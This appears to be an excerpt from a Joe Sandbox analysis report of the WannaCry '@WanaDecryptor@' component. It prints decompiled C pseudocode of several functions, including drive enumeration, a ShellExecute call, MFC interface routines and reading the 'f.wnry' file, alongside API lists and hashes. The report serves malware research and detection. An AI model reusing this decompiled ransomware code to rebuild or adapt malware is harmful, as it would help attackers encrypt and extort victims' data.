Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}

APIs

GetLogicalDrives.KERNEL32 ref: 00403A35
GetDriveTypeW.KERNEL32 ref: 00403A7A
GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95

Strings

\, xrefs: 00403A73
: , xrefs: 00403A53

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: DiskDriveDrivesFreeLogicalSpaceType
String ID: : $\
API String ID: 222820107-856521285
Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}

APIs

#823.MFC42(?), ref: 00406F15
SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
#825.MFC42(?), ref: 00406F62

Strings

open, xrefs: 00406F50

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #823#825ExecuteMessageSendShell
String ID: open
API String ID: 1093558810-2758837156
Opcode ID: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
Opcode Fuzzy Hash: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}

APIs

#324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
#567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
#567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131

Strings

DZA, xrefs: 00403146
0ZA, xrefs: 00403156

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #567$#324
String ID: 0ZA$DZA
API String ID: 784016053-3838179817
Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}

APIs

#324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
#540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
#860.MFC42(00421798), ref: 00404CAD

Strings

0ZA, xrefs: 00404C94
DZA, xrefs: 00404C86

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #324#540#860
String ID: 0ZA$DZA
API String ID: 1048258301-3838179817
Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

APIs

BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
#5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
#5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
#2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
#640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5785$#2414#640
String ID:
API String ID: 2719443296-0
Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65

Uniqueness

Uniqueness Score: -1.00%

Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}

APIs

#289.MFC42 ref: 0040455F
#5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
#5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
#613.MFC42 ref: 004045BB

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#289#613ExtentPoint32Text
String ID:
API String ID: 888490064-0
Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44();
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}

APIs

SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
#353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,755720C0), ref: 00406D39
SendMessageA.USER32 ref: 00406D69
#1979.MFC42 ref: 00406D6F
#665.MFC42 ref: 00406D87

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#1979#353#665
String ID:
API String ID: 3794212480-0
Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72();
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}

APIs

Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039

time.MSVCRT ref: 00407DEA
#2514.MFC42 ref: 00407E18
time.MSVCRT ref: 00407E2A
#765.MFC42 ref: 00407E49
#641.MFC42 ref: 00407E5D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: time$#2514#324#567#641#765
String ID:
API String ID: 3372871541-0
Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}

APIs

#2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
#2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
#616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
#693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
#641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414$#616#641#693
String ID:
API String ID: 1164084425-0
Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6

Uniqueness

Uniqueness Score: -1.00%

Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}

APIs

fopen.MSVCRT ref: 00403B17

Strings

f.wnry, xrefs: 00403B12

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: fopen
